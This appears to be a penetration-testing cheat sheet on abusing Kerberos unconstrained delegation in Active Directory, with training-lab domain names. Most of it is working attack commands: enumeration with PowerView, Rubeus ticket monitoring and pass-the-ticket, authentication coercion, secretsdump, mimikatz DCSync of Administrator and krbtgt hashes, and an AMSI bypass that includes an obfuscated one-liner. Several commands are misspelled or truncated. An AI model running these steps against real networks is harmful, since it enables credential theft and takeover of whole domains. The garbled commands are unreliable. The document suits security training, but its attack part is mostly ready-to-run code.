Kerberos Unconstrained Delegation

Kerberos Unconstrained Delegation

General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain.

Required

1. Define Unconstrained Delegation Machines

2. we need to user who has Access to the machine

Essentially this looks like so: User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server

Tools

GitHub - dirkjanm/krbrelayx: Kerberos unconstrained delegation abuse toolkitGitHub

define Unconstrained Machines

#using PowerView
Get-NetComputer -Unconstrained
Get-DomainComputer -UnConstrained
Get-DomainComputer -Unconstrained -Properties DnsHostName
Get-DomainComputer -unconstrained | select samaccountname
# using Import-Module ActiveDirectory 
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
Get-ADComputer "IIS" -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Hint: discover users that who you have WriteDACL permission on there or do Enumeration to get user

Rubeus

GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub

.\Rubeus.exe ptt /tikcet: base64.exe  monitor /monitornterval:10 /targetuser$ /nowarp

.\Rubeus.exe ptt /tikcet: base64 

.\rubeus.exe asktgt /user:abdo /domain:hacktor.local /ntlm:Hash /outfile:FileName.tgt
#OR
cat b64.txt|base64 -d > ticket.kirbi 

TGT ticket for the websvc account.

After obtaining the TGT tickets from the domain controller, we can now request service tickets for the allowed services, i.e., CIFS and TIME, or alternate services like LDAP or WMI.

Coercer

coerce -u arya.stark -d north.sevenkingdoms.local -p 'Needle' -t kingslanding.sevenkingdoms.local -l winterfell --always-continue

sudo impacket-secretsdump -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING

mimikatz

mimikatz.exe "privilege::debug" "kerberos::ptt PDC.kirbi" "lsadump::dcsync /domain:hacktor.local /user:Administrator" "exit"
#Once the ticket is injected, run DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

now enumerating the computers which have unconstrained delegation enabl

.\powerview.ps1
Get-NetComputer -Unconstrained

• Example output: We find the computer WIN-Q4788GPE9L7 with unconstrained delegation enabled.

Step 2: Find Local Admin Access

Find-LocalAdminAccess

• Output: Our user has local admin access to the computer with unconstrained delegation.

Step 3: Enable PowerShell Remoting

Enable-PSRemoting

Step 4: Create and Use a PowerShell Session

$sess = New-PSSession -ComputerName WIN-Q4788GPE9L7
Invoke-Command -FilePath ..\..\rem01x.crtp\Desktop\tools\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess

• Bypass AMSI:

$amsiBypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static')
$amsiBypass.SetValue($null, $true)


S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')

Step 5: Dump Secrets and List Tickets

Invoke-Mimikatz -Command '"sekurlsa::tickets"'

Step 6: Export Tickets

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

• Example output: Administrator .kirbi file.

Step 7: Monitor Actions on the Machine

Invoke-UserHunter -ComputerName WIN-Q4788GPE9L7 -UserAdminCount -Delay 5 -Verbose

• Output: Administrator account detected.

Step 8: Pass the Ticket to Memory and Impersonate the User

Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\Administrator\kerb\[0;120dde]-2-0-60a10000-Administrator@krbtgt-CRTP.LOCAL.kirbi"'

• Result: We are now the administrator on the machine.

Deep Dive into Unconstrained Delegation

Process Overview

1. Vegeta wants to access the server web01 to list folders.

2. The web01 process impersonates Vegeta and creates a new thread with Vegeta's credentials.

3. The server accesses the intended folder with the impersonated thread.

Configuration

To list computers with unconstrained delegation:

Get-NetComputer -Unconstrained | select cn,useraccountcontrol

Network Traffic (Wireshark Capture)

1. Client requests a TGT.

2. Domain controller responds with the TGT.

3. Client requests a service ticket (TGS) for the web application.

4. Domain controller responds with the TGS.

5. Client requests another TGT to delegate to the web service.

6. Domain controller responds with a copy of the user TGT.

7. The application request goes to the web server.

8. The web service requests a TGS for the SQL server using the client's TGT.

9. Domain controller responds with the TGS.

10. Access is granted and the database server is successfully accessed.

11. Application replies.

Abusing Unconstrained Delegation

Continue monitoring and exploitation using appropriate PowerShell commands and tools.

📚$_References

“Relaying” Kerberos - Having fun with unconstrained delegationdirkjanm.io